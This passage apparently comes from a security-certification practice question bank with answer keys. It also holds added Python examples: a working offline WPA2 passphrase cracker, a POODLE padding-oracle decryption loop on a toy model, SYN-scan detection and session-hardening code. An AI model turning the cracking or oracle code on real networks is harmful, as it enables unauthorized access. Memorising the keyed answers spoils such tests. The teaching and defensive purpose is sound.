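    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    AA = AP MAC, SPA = client MAC. The first 16 bytes are the KCK used for MICs."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type (1) + key info (2) + key len (2)
                  # + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8)

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame with
    its MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_sample_handshake(passphrase: str) -> dict:
    """Synthetic message 2 of the four-way handshake (client -> AP): the first
    frame that carries a MIC and therefore the first that can be checked offline."""
    ssid = "CorpWiFi"
    aa = bytes.fromhex("001122334455")
    spa = bytes.fromhex("aabbccddee01")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    key_info = 0x010A      # descriptor version 2 (HMAC-SHA1), pairwise key, MIC present
    body = (b"\x02" + struct.pack("!HH", key_info, 16) + b"\x00" * 7 + b"\x01" +   # type, info, keylen, replay ctr
            snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    eapol = b"\x02\x03" + struct.pack("!H", len(body)) + body                       # EAPOL v2, type Key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}

def crack(hs: dict, wordlist):
    """Per candidate: PBKDF2 -> PRF-512 -> KCK -> recompute MIC and compare."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None

if __name__ == "__main__":
    hs = build_sample_handshake("CorpWiFi2024")
    print("recovered:", crack(hs, ["password", "letmein", "CorpWiFi2024", "qwerty123"]))
```

Everything the verifier needs (SSID, both MACs, both nonces, one MIC-bearing EAPOL frame) is visible in the air, which is why capturing the handshake is equivalent to obtaining a password hash; the only defense at the protocol level is a passphrase that is not in any wordlist, or moving to WPA3-SAE, whose handshake does not allow this offline check.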

Question 173 

Which type of attack attempts to overwhelm a system with ICMP echo requests?

A) Ping flood
B) SYN flood
C) Smurf attack
D) Teardrop attack

Answer:  A) Ping flood

Explanation:

A ping flood is a type of Denial-of-Service (DoS) attack that targets network bandwidth and system resources by sending a large volume of ICMP echo request packets (ping requests) to a target. The target system attempts to respond to each request, consuming processing power and network capacity, potentially slowing down or crashing the system. Ping flood attacks are simple but effective, particularly against systems with limited bandwidth.

SYN flood attacks exploit the TCP three-way handshake by sending excessive SYN packets to target ports, consuming memory and resources for half-open connections. This attack does not involve ICMP echo requests. Smurf attacks are a form of amplified ICMP flooding that use broadcast addresses to generate large amounts of responses toward a victim. While related to ICMP, Smurf attacks rely on amplification and spoofing, unlike a direct ping flood. Teardrop attacks exploit TCP/IP fragmentation issues by sending overlapping fragmented packets that crash older operating systems. They do not involve ICMP echo requests.

Because the question specifically mentions overwhelming a system with ICMP echo requests, ping flood is the correct answer. It directly matches the described method and effect, distinguishing it from SYN flood, Smurf, or Teardrop attacks.

Question 174 

Which type of malware is designed to remain undetected by hiding system processes and files?

A) Worm
B) Rootkit
C) Trojan
D) Adware

Answer: B) Rootkit

Explanation:

A rootkit is a type of malware designed specifically for stealth and persistence. It embeds itself deeply into the operating system, often at the kernel level, to hide processes, files, registry entries, and network activity. Rootkits allow attackers to maintain covert access to a system without triggering security alerts or detection mechanisms. They can facilitate data exfiltration, remote control, or deployment of additional malware while remaining invisible to antivirus or system monitoring tools.

Worms are self-replicating malware that propagate across networks. Their primary goal is rapid spread, not stealth, so they do not inherently hide processes or files. Trojans disguise themselves as legitimate software and may deliver malicious payloads, but they do not inherently manipulate system functions to remain undetected like rootkits. Adware generates advertisements and revenue for its creators. It typically does not hide itself or alter core system operations, making it unrelated to stealth-focused malware.

The question specifies malware that hides system processes and files to remain undetected, which precisely describes a rootkit. Its ability to operate covertly over extended periods makes it one of the most dangerous types of malware for persistent system compromise.

Question 175 

Which vulnerability allows attackers to inject malicious SQL statements into an application?

A) Cross-site scripting
B) SQL injection
C) Command injection
D) LDAP injection

Answer: B) SQL injection

Explanation: 

SQL injection (SQLi) is one of the most significant and widely exploited vulnerabilities in web applications, primarily because it targets the heart of an application’s data storage system—its backend database. SQL injection occurs when attackers insert or “inject” malicious SQL statements into input fields, form parameters, cookies, HTTP headers, or URL query strings. When the application fails to properly validate or sanitize this input, the malicious SQL is executed by the database engine. This can lead to severe consequences, including unauthorized data retrieval, modification, deletion, or even complete compromise of the entire database server. SQLi exploits weak coding practices such as dynamic query construction, lack of prepared statements, and insufficient input validation. Because SQL injection directly manipulates the server-side SQL queries, it enables attackers to bypass authentication, extract sensitive information such as usernames and passwords, tamper with existing data, or escalate privileges inside the system.

SQL injection differs fundamentally from other injection-style attacks, each of which targets different components of the system. For example, cross-site scripting (XSS) affects users rather than servers. In an XSS attack, the attacker injects malicious scripts—typically JavaScript—that execute in the victim’s browser. This can lead to session theft, credential capture, or unauthorized actions performed on behalf of the user. However, XSS does not directly interact with the SQL database or alter backend SQL queries.

Command injection is another distinct attack type, but instead of targeting SQL queries, it exploits vulnerabilities that allow execution of operating system commands. Through command injection, attackers might run system-level commands such as reading files, creating new processes, or opening network connections. It compromises the underlying OS rather than the database layer.

Similarly, LDAP injection affects directory services, such as those used for authentication or organizational data retrieval. LDAP queries are structured differently from SQL queries, and an LDAP injection manipulates these directory queries rather than interacting with relational databases.

Because the question clearly specifies the injection of SQL statements, SQL injection is unequivocally the correct answer. It is the only attack type among the options that directly compromises the database layer by manipulating SQL-based commands. SQLi remains one of the most dangerous vulnerabilities due to its potential impact, often granting attackers full control over stored data. Proper safeguards such as input validation, prepared statements, parameterized queries, and least-privilege database accounts are essential defenses to mitigate SQL injection risks in modern web applications.

Question 176 

Which attack allows an attacker to intercept, modify, or inject traffic between two communicating systems?

A) Man-in-the-middle
B) Replay attack
C) DNS spoofing
D) Smurf attack

Answer:  A) Man-in-the-middle

Explanation:

A man-in-the-middle (MITM) attack is a sophisticated method where an attacker secretly intercepts communication between two parties. Unlike attacks that simply capture data, MITM allows the attacker to read, modify, or inject messages in real time. This capability makes it particularly dangerous, as the victim often remains unaware that the communication is being tampered with. MITM can be executed over unsecured Wi-Fi networks, compromised routers, or by exploiting vulnerabilities in encryption protocols.

Replay attacks, by contrast, operate differently. They capture valid data transmissions and retransmit them later to achieve unauthorized effects, such as reusing login credentials. Replay attacks do not intercept ongoing traffic in real time nor allow message modification, which is a key distinction from MITM. Therefore, they do not fit the scenario described in the question.

DNS spoofing is another type of attack that can redirect traffic by providing false IP addresses for requested domain names. While DNS spoofing can mislead users into visiting malicious sites, it does not grant the attacker the ability to intercept and manipulate communication between legitimate systems. It primarily changes the destination rather than altering messages in transit.

Smurf attacks, meanwhile, are ICMP-based denial-of-service attacks that flood a network by amplifying traffic. They are not designed for intercepting or modifying communication and therefore are unrelated to the scenario of ongoing traffic manipulation. Considering these distinctions, man-in-the-middle is the most precise answer, as it directly allows interception, modification, and injection of messages between two communicating systems, which exactly matches the question description.

Question 177 

Which scanning technique attempts to discover live hosts without sending full TCP connections?

A) TCP connect scan
B) SYN scan
C) UDP scan
D) ACK scan

Answer: B) SYN scan

Explanation:

A SYN scan, often called a half-open scan, sends a SYN segment to each target port, the first step of the TCP three-way handshake, and reads the port state from the reply. An open port answers SYN-ACK, a closed port answers RST, and no answer (or an ICMP unreachable) means the port is filtered. Rather than completing the handshake with the final ACK, the scanner tears the half-open connection down with a RST (with a raw-socket scanner such as nmap -sS the kernel does this itself, because no local socket owns the connection). Open ports and live hosts are identified without a single TCP session being established.

The scan is valued for speed and for a specific, limited kind of stealth. Because the handshake never completes, the listening application never sees the connection, so application-level logs (web server access logs, SSH authentication logs) record nothing. It is not invisible on the network: every SYN still crosses the wire, and firewalls, IDS sensors and flow monitors detect scans by counting SYNs to many ports from one source. SYN scanning also requires raw-socket privileges (root or CAP_NET_RAW), which is why nmap falls back to a connect scan for unprivileged users.

In contrast, a TCP connect scan uses the operating system's connect() call and therefore completes the full three-way handshake (SYN, SYN-ACK, ACK) followed by a normal close. It needs no special privileges and identifies open ports reliably, but every open port it finds produces a completed connection that the target application can log. It therefore fails the requirement of avoiding full connections.

Other scanning techniques operate differently and serve different objectives. UDP scans probe ports of a connectionless protocol, so there is no handshake at all; the scanner infers a closed port from an ICMP port-unreachable reply and an open or filtered port from silence or from a service response. ACK scans send packets with only the ACK flag set; an unfiltered port answers with a RST whether it is open or closed, so ACK scans map firewall rules (filtered versus unfiltered) rather than distinguish open from closed ports or discover live hosts in the way a SYN scan does.

Given these distinctions, the SYN scan is the most accurate answer to the scenario described. Its ability to identify live systems and open ports while avoiding the establishment of full TCP connections aligns perfectly with the requirements of stealthy network reconnaissance. This makes it a powerful and commonly utilized tool for attackers who aim to gather critical information with minimal visibility and risk during the initial stages of a network attack.
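As an added illustration, not part of the original question set, the following Python script shows both sides of the half-open scan described above: how the scanner infers open, closed or filtered from the reply to each SYN, and how a network monitor that sees the same packets flags the scan even though no connection was ever completed. The packet summaries are constructed for this example in a tcpdump-like shape; the field layout, the 5-second window and the 5-port threshold are assumptions of the example, not any real tool's defaults.

```python
"""Classify SYN-probe responses and detect half-open scans from a packet summary log."""
from collections import defaultdict

# Constructed packet summaries: (time_s, src_ip, src_port, dst_ip, dst_port, tcp_flags).
# Flags use tcpdump-style letters: S=SYN, A=ACK, R=RST, so "SA" is SYN-ACK and "RA" is RST-ACK.
PACKETS = [
    # Half-open scan from 10.0.0.5 against 10.0.0.20
    (1.00, "10.0.0.5", 40001, "10.0.0.20", 22,   "S"),
    (1.01, "10.0.0.20", 22,  "10.0.0.5", 40001, "SA"),
    (1.01, "10.0.0.5", 40001, "10.0.0.20", 22,   "R"),    # scanner resets instead of completing
    (1.02, "10.0.0.5", 40002, "10.0.0.20", 80,   "S"),
    (1.03, "10.0.0.20", 80,  "10.0.0.5", 40002, "SA"),
    (1.03, "10.0.0.5", 40002, "10.0.0.20", 80,   "R"),
    (1.04, "10.0.0.5", 40003, "10.0.0.20", 443,  "S"),
    (1.05, "10.0.0.20", 443, "10.0.0.5", 40003, "RA"),   # closed port answers RST-ACK
    (1.06, "10.0.0.5", 40004, "10.0.0.20", 8080, "S"),   # no answer at all: filtered
    (1.08, "10.0.0.5", 40005, "10.0.0.20", 3389, "S"),
    (1.09, "10.0.0.20", 3389, "10.0.0.5", 40005, "RA"),
    (1.10, "10.0.0.5", 40006, "10.0.0.20", 25,   "S"),
    (1.11, "10.0.0.20", 25,  "10.0.0.5", 40006, "RA"),
    # Legitimate full handshake from 10.0.0.7 (SYN, SYN-ACK, ACK)
    (2.00, "10.0.0.7", 51000, "10.0.0.20", 80,   "S"),
    (2.01, "10.0.0.20", 80,  "10.0.0.7", 51000, "SA"),
    (2.01, "10.0.0.7", 51000, "10.0.0.20", 80,   "A"),
]


def build_flows(packets):
    """Group packets into flows keyed by (client, client_port, server, server_port).
    The client is whoever sent the bare SYN; later packets are matched in either direction."""
    flows = {}
    for t, src, sport, dst, dport, flags in packets:
        if flags == "S":
            flows[(src, sport, dst, dport)] = {"syn": t, "synack": None, "rst_from_server": False,
                                              "client_ack": False, "client_rst": False}
            continue
        client_key = (src, sport, dst, dport)
        server_key = (dst, dport, src, sport)
        if client_key in flows:                       # packet from the client
            f = flows[client_key]
            if "A" in flags and "R" not in flags and "S" not in flags:
                f["client_ack"] = True                # third step of the handshake: a real connection
            if "R" in flags:
                f["client_rst"] = True                # scanner tearing the half-open probe down
        elif server_key in flows:                     # packet from the server
            f = flows[server_key]
            if "S" in flags and "A" in flags:
                f["synack"] = t
            elif "R" in flags:
                f["rst_from_server"] = True
    return flows


def port_state(flow):
    """The scanner's inference from one probe (ICMP unreachables are outside this summary format)."""
    if flow["synack"] is not None:
        return "open"
    if flow["rst_from_server"]:
        return "closed"
    return "filtered"


def scan_results(flows, scanner):
    """What the scanner learned: target port -> state, for every probe it sent."""
    return {dport: port_state(f) for (client, _, _, dport), f in flows.items() if client == scanner}


def detect_syn_scans(flows, window=5.0, threshold=5):
    """Defender's view: alert on a client that opened >= threshold distinct half-open probes
    (SYN sent, handshake never completed by the client) to one host within `window` seconds.
    The legitimate connection is excluded because its client sent the final ACK."""
    by_pair = defaultdict(list)
    for (client, _, server, dport), f in flows.items():
        if not f["client_ack"]:
            by_pair[(client, server)].append((f["syn"], dport))
    alerts = {}
    for pair, probes in by_pair.items():
        probes.sort()
        times = [p[0] for p in probes]
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            ports = {p[1] for p in probes[i:j]}
            if len(ports) >= threshold:
                alerts[pair] = sorted(ports)
                break
    return alerts


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    print("scanner sees:", scan_results(flows, "10.0.0.5"))
    print("monitor alerts:", detect_syn_scans(flows))
```

The point of the two views side by side: the scanner never completed a connection, so the web server on port 80 logged nothing, yet the monitor that watched the wire has everything it needs to name the scanner and list the ports it touched.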

Question 178

Which attack exploits weaknesses in SSL/TLS by forcing downgrades to weaker encryption?

A) POODLE
B) Heartbleed
C) CRIME
D) BEAST

Answer:  A) POODLE

Explanation: 

The POODLE attack (Padding Oracle On Downgraded Legacy Encryption, CVE-2014-3566) targets SSL 3.0, the obsolete predecessor of TLS. Two weaknesses combine. The first is the downgrade. Many clients, browsers in particular, implemented a fallback in which a failed handshake was simply retried with an older protocol version, for compatibility with old or buggy servers. An attacker on the network path can make every TLS 1.0, 1.1 or 1.2 handshake fail (for example by dropping the handshake packets) until the client retries with SSL 3.0, which the server still accepts; TLS 1.3 did not exist at the time and has no such fallback. The second is the padding oracle. SSL 3.0 uses MAC-then-encrypt with CBC mode, and its padding is validated only by the last byte, the padding length; the other padding bytes are never checked. With script running in the victim's browser, the attacker positions the victim's cookie at a chosen offset in a request so that one byte of it sits at the end of a ciphertext block, copies that block over the final, all-padding block, and watches whether the server accepts the record. Acceptance happens about once in 256 attempts and reveals one byte of the cookie; repeating the process recovers cookies or authentication tokens without ever recovering the key.

It is crucial to differentiate POODLE from other SSL/TLS vulnerabilities, as each targets distinct weaknesses. For example, Heartbleed exploits a buffer over-read in certain OpenSSL implementations. By sending specially crafted heartbeat requests, an attacker can retrieve portions of server memory, which might include private keys, passwords, or other sensitive data. While extremely serious, Heartbleed does not rely on downgrading the protocol or manipulating SSL versions. Similarly, the CRIME attack focuses on SSL/TLS compression. By exploiting the compression of plaintext before encryption, attackers can infer secrets like session cookies through careful observation of compressed ciphertext lengths. CRIME’s mechanism is unrelated to protocol downgrades and does not exploit SSL 3.0 padding.

The BEAST attack targets TLS 1.0's CBC mode, in which the initialization vector for each record is the last ciphertext block of the previous record and is therefore predictable to anyone watching the connection. With chosen-plaintext capability, again script in the victim's browser, an attacker can test guesses for one byte of a secret such as a cookie at a time. BEAST decrypts traffic on the negotiated TLS 1.0 connection; it does not force the peers onto a weaker version, so it does not match a scenario built around protocol downgrade.

Because the scenario specifically mentions forcing a downgrade to weaker encryption, POODLE is the correct answer. The durable fix was to disable SSL 3.0 on both clients and servers; where a client still performs fallback retries, it should include the TLS_FALLBACK_SCSV signalling cipher suite (RFC 7507) in the retried handshake so that a server supporting a higher version rejects the downgraded attempt. More generally, the attack shows why keeping a legacy protocol version enabled "just in case" is itself a vulnerability: when both sides accept it, the attacker gets to choose which version is used.
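To make the padding-oracle step concrete, here is an added, self-contained Python simulation of the POODLE decryption loop; it is not code from the original page or from any real attack tool. It models only what the attack needs: MAC-then-pad-then-CBC with SSL 3.0 padding rules, a fresh IV per record, and a server that answers nothing more than accept or reject. A toy Feistel cipher built from SHA-256 stands in for the real block cipher (the attack never touches the cipher, only the CBC chaining and the padding check), HMAC-SHA256 stands in for SSL 3.0's MAC, and the downgrade is assumed to have already happened.

```python
"""Toy model of the POODLE padding oracle against SSL 3.0 CBC records (added example)."""
import hashlib
import hmac
import os

B = 16            # CBC block size
MAC_LEN = 32      # HMAC-SHA256 tag; SSL 3.0 really uses an MD5/SHA-1 construction, the length is irrelevant here
ROUNDS = 4
MAX_TRIES = 20000  # ~256 expected submissions per byte; the cap only stops a bug from looping forever


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, r, half):
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def block_encrypt(key, block):
    """Toy 16-byte Feistel cipher standing in for 3DES/AES; only invertibility matters."""
    left, right = block[:8], block[8:]
    for r in range(ROUNDS):
        left, right = right, _xor(left, _round(key, r, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for r in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, r, left)), left
    return left + right


def ssl3_pad(data):
    """SSL 3.0 padding: the last byte is the number of padding bytes before it; those bytes are NOT checked."""
    n = B - len(data) % B                       # 1..16: a full extra block when data is already aligned
    return data + os.urandom(n - 1) + bytes([n - 1])


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for k in range(0, len(pt), B):
        prev = block_encrypt(key, _xor(pt[k:k + B], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for k in range(0, len(ct), B):
        out.append(_xor(block_decrypt(key, ct[k:k + B]), prev))
        prev = ct[k:k + B]
    return b"".join(out)


class Ssl3Endpoint:
    """Both peers of a toy SSL 3.0 session: MAC, then pad, then CBC-encrypt, as in the real protocol."""

    def __init__(self, enc_key, mac_key, secret):
        self.enc_key, self.mac_key, self.secret = enc_key, mac_key, secret

    def client_send(self, prefix_len, suffix_len):
        """The attacker's script controls the request path (prefix) and body (suffix) lengths;
        the browser inserts the cookie (secret) between them. Fresh random IV per record."""
        pt = b"A" * prefix_len + self.secret + b"B" * suffix_len
        tag = hmac.new(self.mac_key, pt, hashlib.sha256).digest()
        iv = os.urandom(B)
        return iv + cbc_encrypt(self.enc_key, iv, ssl3_pad(pt + tag))

    def server_accept(self, record):
        """The oracle: True only if the padding length is plausible AND the MAC verifies."""
        iv, ct = record[:B], record[B:]
        pt = cbc_decrypt(self.enc_key, iv, ct)
        pad_len = pt[-1]
        if pad_len >= B:
            return False
        data = pt[:len(pt) - pad_len - 1]
        if len(data) < MAC_LEN:
            return False
        msg, tag = data[:-MAC_LEN], data[-MAC_LEN:]
        return hmac.compare_digest(tag, hmac.new(self.mac_key, msg, hashlib.sha256).digest())


def poodle_recover(endpoint, secret_len):
    """Recover the secret one byte at a time using nothing but the accept/reject oracle."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix_len = (B - 1 - j) % B                                  # put secret[j] last in its block
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % B       # align data so the pad is a full block
        target = (prefix_len + j) // B                                # plaintext block index holding secret[j]
        for _ in range(MAX_TRIES):
            rec = endpoint.client_send(prefix_len, suffix_len)
            blocks = [rec[k:k + B] for k in range(0, len(rec), B)]   # blocks[0] is the IV, blocks[i+1] is C_i
            forged = blocks[:-1] + [blocks[target + 1]]               # copy C_target over the padding block
            if endpoint.server_accept(b"".join(forged)):
                # accept  =>  D(C_target)[15] ^ C_last-1[15] == 15,  and  P_target[15] = D(C_target)[15] ^ C_target-1[15]
                recovered.append((B - 1) ^ blocks[-2][-1] ^ blocks[target][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; not expected at 1/256 per try")
    return bytes(recovered)


if __name__ == "__main__":
    ep = Ssl3Endpoint(os.urandom(16), os.urandom(16), b"SID=7f3a9c")
    print(poodle_recover(ep, 10))
```

Each recovered byte costs about 256 submissions, which is why the real attack needs the victim's browser to replay requests automatically. The same loop fails against TLS 1.0 and later: there every padding byte must equal the length byte, so a copied ciphertext block is rejected regardless of what its last byte decrypts to.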

Question 179 

Which attack captures authentication tokens or session cookies to impersonate a legitimate user?

A) Phishing
B) Session hijacking
C) Keylogging
D) SQL injection

Answer: B) Session hijacking

Explanation:

Session hijacking is a type of cyberattack in which an attacker takes control of an active session between a user and a web application or network service. In this scenario, a session is the period during which a user is authenticated and interacting with a system, usually maintained through session tokens, session IDs, or cookies. These tokens act as temporary credentials, proving the user’s identity and granting access to resources without repeatedly requesting the username and password. When an attacker successfully intercepts these session tokens, they can impersonate the legitimate user, gaining unauthorized access to accounts, applications, and sensitive data without ever needing the actual password. This capability makes session hijacking particularly dangerous because it bypasses conventional authentication measures and allows attackers to operate with the privileges of the compromised user, often unnoticed.

Session hijacking can occur through multiple methods. One common technique is a man-in-the-middle (MITM) attack, where the attacker intercepts communication between the user and the server, capturing session cookies or tokens as they are transmitted over the network. Another method involves cross-site scripting (XSS) attacks, where malicious scripts embedded on a web page can read cookies stored in the browser and transmit them to an attacker. Network sniffing tools can also be used on unsecured networks to capture session identifiers in transit. Once obtained, these tokens allow attackers to bypass login procedures, making it a highly effective method for unauthorized access.

It is important to distinguish session hijacking from other attack vectors. Phishing attacks, for example, rely on tricking users into voluntarily divulging credentials, often through fake websites or deceptive emails. While phishing can lead to account compromise, it does not directly capture or reuse active session tokens. Similarly, keylogging records keystrokes to capture passwords but does not provide access to live sessions or session identifiers. SQL injection is a database-focused attack that manipulates backend queries to retrieve or modify data. While it may expose stored authentication information, it does not inherently capture real-time session tokens, so it cannot directly impersonate a user in an ongoing session.

Therefore, among these options, session hijacking is the correct answer: by capturing session tokens or cookies, the attacker impersonates a legitimate user without the password, which is exactly the scenario described. Defending against it means protecting the token everywhere it lives. In transit, use HTTPS everywhere and mark the cookie Secure so it is never sent in clear text where a sniffer could read it. In the browser, mark it HttpOnly so that script, including an XSS payload, cannot read it, and set SameSite so it is not attached to cross-site requests. On the server, generate long random tokens from a cryptographically secure generator, issue a new token after login (against session fixation), enforce absolute and idle expiry, and invalidate the token at logout. Multi-factor authentication raises the cost of obtaining a session in the first place but does nothing once a valid token has been stolen, which is why the token-handling controls matter most.
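An added example, not from the original page, of the server-side controls just listed, written in Python: tokens from a CSPRNG, rotation after login, absolute and idle expiry, a deliberately weak client binding as a tripwire, and the cookie attributes that deny XSS and sniffing access to the token. The store, the fingerprint scheme and the timeouts are this example's own choices and not any particular framework's API.

```python
"""Server-side session handling that limits what a captured session token is worth (added example)."""
import hashlib
import hmac
import secrets
import time

ABSOLUTE_TTL = 8 * 3600   # a token dies 8 h after it was issued no matter what (assumed policy)
IDLE_TTL = 15 * 60        # and after 15 min without a request (assumed policy)


def client_fingerprint(client):
    """Weak binding of the token to the client: User-Agent plus the /24 of the source address.
    It stops naive replay from another network but not an attacker behind the same NAT or proxy,
    so treat it as a tripwire rather than the control."""
    net = ".".join(client["ip"].split(".")[:3])
    return hashlib.sha256(f"{client['ua']}|{net}".encode()).hexdigest()


class SessionStore:
    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be exercised without sleeping
        self._sessions = {}      # token -> {"user", "created", "last_seen", "fp"}

    def create(self, user, client):
        token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG: not guessable or predictable
        t = self._now()
        self._sessions[token] = {"user": user, "created": t, "last_seen": t,
                                 "fp": client_fingerprint(client)}
        return token

    def rotate(self, token, client):
        """Issue a fresh token and retire the old one. Call this right after login or a privilege
        change so that a token fixed or captured before authentication is worthless afterwards."""
        rec = self._sessions.pop(token, None)
        return None if rec is None else self.create(rec["user"], client)

    def validate(self, token, client):
        """Return (user, "ok") or (None, reason). Every rejection also deletes the token."""
        rec = self._sessions.get(token)
        if rec is None:
            return None, "unknown"
        t = self._now()
        if t - rec["created"] > ABSOLUTE_TTL:
            self._sessions.pop(token)
            return None, "expired"
        if t - rec["last_seen"] > IDLE_TTL:
            self._sessions.pop(token)
            return None, "idle"
        if not hmac.compare_digest(rec["fp"], client_fingerprint(client)):
            self._sessions.pop(token)     # a replay from elsewhere burns the session for thief and victim alike
            return None, "fingerprint"
        rec["last_seen"] = t
        return rec["user"], "ok"

    def logout(self, token):
        self._sessions.pop(token, None)


def set_cookie_header(token):
    """Cookie attributes that close the capture paths named in the text: Secure (never sent over
    plaintext HTTP, so not sniffable), HttpOnly (document.cookie cannot read it, so XSS cannot
    exfiltrate it), SameSite=Strict (not attached to cross-site requests)."""
    return f"sid={token}; Path=/; Secure; HttpOnly; SameSite=Strict; Max-Age={ABSOLUTE_TTL}"


if __name__ == "__main__":
    store = SessionStore()
    alice = {"ip": "203.0.113.10", "ua": "Mozilla/5.0 (X11; Linux x86_64)"}
    thief = {"ip": "198.51.100.7", "ua": "curl/8.4.0"}
    tok = store.create("alice", alice)
    print(set_cookie_header(tok))
    print(store.validate(tok, alice))   # ('alice', 'ok')
    print(store.validate(tok, thief))   # (None, 'fingerprint'): the stolen cookie replayed from elsewhere
```

The fingerprint check is the one control here that trades usability for security (a user moving between networks will be logged out), which is why it is kept weak and why the expiry and rotation rules, which cost the user nothing, carry most of the weight.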

Question 180 

Which reconnaissance technique collects information from publicly available sources without interacting with the target?

A) Active reconnaissance
B) Passive reconnaissance
C) Social engineering
D) Credential harvesting

Answer: B) Passive reconnaissance

Explanation:

Passive reconnaissance gathers information about a target from sources that are already public, without sending a single packet to the target's own infrastructure. Typical sources are WHOIS and registrar records, public DNS data, search engine results and cached pages, archived copies of the target's websites, Certificate Transparency logs, job postings that name internal technologies, social media profiles of employees, public code repositories and published documents with revealing metadata. Because the target never receives traffic from the attacker, there is nothing for its firewall, intrusion detection system or web server logs to record, which is exactly the property the question describes. What is learned passively (domains, IP ranges, technologies, people) then makes any later active work far more precise.

Active reconnaissance, by contrast, interacts with the target directly: ping sweeps, port scans, banner grabbing, DNS zone transfer attempts, crawling the live site or probing its forms. These steps yield information that cannot be obtained from public sources, but they generate traffic that the target can log and alert on, so they do not match the requirement of no interaction.

Social engineering manipulates people rather than systems, for example by phoning the help desk or sending a pretext email to obtain information or access. It depends on direct contact with the target's staff, so it is a form of interaction, and it is a technique for extracting information rather than a method of collecting it from public sources. Credential harvesting is the collection of usernames and passwords, typically through phishing pages, malware or leaked breach data; it is an attack outcome rather than a reconnaissance method, and in its common forms it requires interacting with the victims.

Therefore passive reconnaissance is the correct answer. The defensive corollary is that an organization should periodically perform the same exercise against itself: review what its registrar records, DNS, certificates, job advertisements and employee profiles reveal, and reduce that footprint where the information serves no business purpose.
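As an added example of passive collection for Question 180, not part of the original page: Certificate Transparency logs are a public source that records every certificate issued for a domain, so a script can enumerate hostnames, wildcards and forgotten expired hosts without ever resolving or connecting to the target. The JSON below is constructed to mirror the field names crt.sh returns for a query such as https://crt.sh/?q=%25.example.com&output=json (an assumption about that service's output format; the certificates and the CA are invented), and the scope rule and staleness logic are this example's own.

```python
"""Passive subdomain enumeration from Certificate Transparency records; no traffic to the target (added example)."""
import json

APEX = "example.com"

# Constructed sample in the shape of crt.sh's JSON output; field names follow that service,
# the certificates and the issuing CA are made up for this example.
CRT_SH_SAMPLE = json.dumps([
    {"issuer_name": "C=XX, O=Example CA", "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2024-01-10T00:00:00", "not_after": "2024-04-09T23:59:59"},
    {"issuer_name": "C=XX, O=Example CA", "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\nvpn.dev.example.com",
     "not_before": "2023-06-01T00:00:00", "not_after": "2024-06-01T23:59:59"},
    {"issuer_name": "C=XX, O=Example CA", "common_name": "MAIL.Example.com",
     "name_value": "MAIL.Example.com",
     "not_before": "2024-02-01T00:00:00", "not_after": "2024-12-31T23:59:59"},
    {"issuer_name": "C=XX, O=Example CA", "common_name": "example.com.evil-lookalike.net",
     "name_value": "example.com.evil-lookalike.net",            # out of scope: a different registrable domain
     "not_before": "2024-02-01T00:00:00", "not_after": "2024-05-01T23:59:59"},
    {"issuer_name": "C=XX, O=Example CA", "common_name": "old-staging.example.com",
     "name_value": "old-staging.example.com",                   # only an expired cert: a forgotten host?
     "not_before": "2021-02-01T00:00:00", "not_after": "2021-05-01T23:59:59"},
])


def in_scope(name, apex):
    """True only for the apex itself or a subdomain of it; suffix tricks like example.com.attacker.net fail."""
    return name == apex or name.endswith("." + apex)


def parse_ct(raw_json, apex):
    """Return ({hostname: latest not_after seen}, [wildcard names]) for in-scope entries.
    Names are lower-cased and de-duplicated across certificates. Wildcards are kept apart
    because a wildcard certificate does not prove that any particular host under it exists."""
    hosts, wildcards = {}, set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):   # crt.sh joins SANs with newlines
            name = name.strip().lower()
            if not name or not in_scope(name, apex):
                continue
            if name.startswith("*."):
                wildcards.add(name)
                continue
            hosts[name] = max(hosts.get(name, ""), entry.get("not_after", ""))
    return hosts, sorted(wildcards)


def stale_hosts(hosts, today):
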